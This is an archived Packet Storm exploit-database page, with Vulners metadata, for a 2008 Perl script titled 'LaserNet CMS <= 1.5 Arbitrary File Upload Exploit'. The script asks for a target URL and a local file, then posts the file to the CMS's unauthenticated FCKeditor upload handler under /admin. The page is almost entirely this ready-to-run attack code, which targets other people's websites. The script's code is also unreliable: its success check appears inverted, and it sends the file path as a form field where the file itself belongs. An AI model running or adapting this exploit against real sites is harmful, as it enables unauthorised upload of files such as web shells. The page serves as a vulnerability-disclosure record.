Search...

lasernet-upload.txt

2008-06-23T00:00:00

ID PACKETSTORM:67555
Type packetstorm
Reporter t0pp8uzz
Modified 2008-06-23T00:00:00

Description

                                        
                                            `#!/usr/bin/perl  
  
use strict;  
use warnings;  
use LWP::UserAgent;  
use HTTP::Request::Common;  
  
print &lt;&lt;INTRO;  
+++++++++++++++++++++++++++++++++++++++++++++++++++++  
+ LaserNet CMS &lt;= 1.5 Arbitrary File Upload Exploit +  
+ +  
+ Discovered && Coded By: t0pP8uZz +  
+ Discovered On: 19 JUNE 2008 / milw0rm.com +  
+ Script Download: http://lasernet.gr/cms.php +  
+++++++++++++++++++++++++++++++++++++++++++++++++++++  
  
INTRO  
  
print "Enter URL(ie: http://site.com): ";  
chomp(my $url=&lt;STDIN&gt;);  
  
print "Enter File Path(path to local file to upload): ";  
chomp(my $file=&lt;STDIN&gt;);  
  
my $ua = LWP::UserAgent-&gt;new;  
my $re = $ua-&gt;request(POST $url.'/admin/FCKeditor/editor/filemanager/upload/php/upload.php',  
Content_Type =&gt; 'form-data',  
Content =&gt; [ NewFile =&gt; $file ] );  
  
if($re-&gt;is_success) {  
if( index($re-&gt;content, "Disabled") != -1 ) { print "Exploit Successfull! File Uploaded!\n"; }  
else { print "File Upload Is Disabled! Failed!\n"; }  
} else { print "HTTP Request Failed!\n"; }  
  
exit;  
`

JSON Vulners Source

Initial Source

{"id": "PACKETSTORM:67555", "type": "packetstorm", "bulletinFamily": "exploit", "title": "lasernet-upload.txt", "description": "", "published": "2008-06-23T00:00:00", "modified": "2008-06-23T00:00:00", "cvss": {"vector": "NONE", "score": 0.0}, "href": "https://packetstormsecurity.com/files/67555/lasernet-upload.txt.html", "reporter": "t0pp8uzz", "references": [], "cvelist": [], "lastseen": "2016-11-03T10:25:40", "viewCount": 1, "enchantments": {"score": {"value": -0.2, "vector": "NONE", "modified": "2016-11-03T10:25:40", "rev": 2}, "dependencies": {"references": [], "modified": "2016-11-03T10:25:40", "rev": 2}, "vulnersScore": -0.2}, "sourceHref": "https://packetstormsecurity.com/files/download/67555/lasernet-upload.txt", "sourceData": "`#!/usr/bin/perl \n \nuse strict; \nuse warnings; \nuse LWP::UserAgent; \nuse HTTP::Request::Common; \n \nprint <<INTRO; \n+++++++++++++++++++++++++++++++++++++++++++++++++++++ \n+ LaserNet CMS <= 1.5 Arbitrary File Upload Exploit + \n+ + \n+ Discovered && Coded By: t0pP8uZz + \n+ Discovered On: 19 JUNE 2008 / milw0rm.com + \n+ Script Download: http://lasernet.gr/cms.php + \n+++++++++++++++++++++++++++++++++++++++++++++++++++++ \n \nINTRO \n \nprint \"Enter URL(ie: http://site.com): \"; \nchomp(my $url=<STDIN>); \n \nprint \"Enter File Path(path to local file to upload): \"; \nchomp(my $file=<STDIN>); \n \nmy $ua = LWP::UserAgent->new; \nmy $re = $ua->request(POST $url.'/admin/FCKeditor/editor/filemanager/upload/php/upload.php', \nContent_Type => 'form-data', \nContent => [ NewFile => $file ] ); \n \nif($re->is_success) { \nif( index($re->content, \"Disabled\") != -1 ) { print \"Exploit Successfull! File Uploaded!\\n\"; } \nelse { print \"File Upload Is Disabled! Failed!\\n\"; } \n} else { print \"HTTP Request Failed!\\n\"; } \n \nexit; \n`\n"}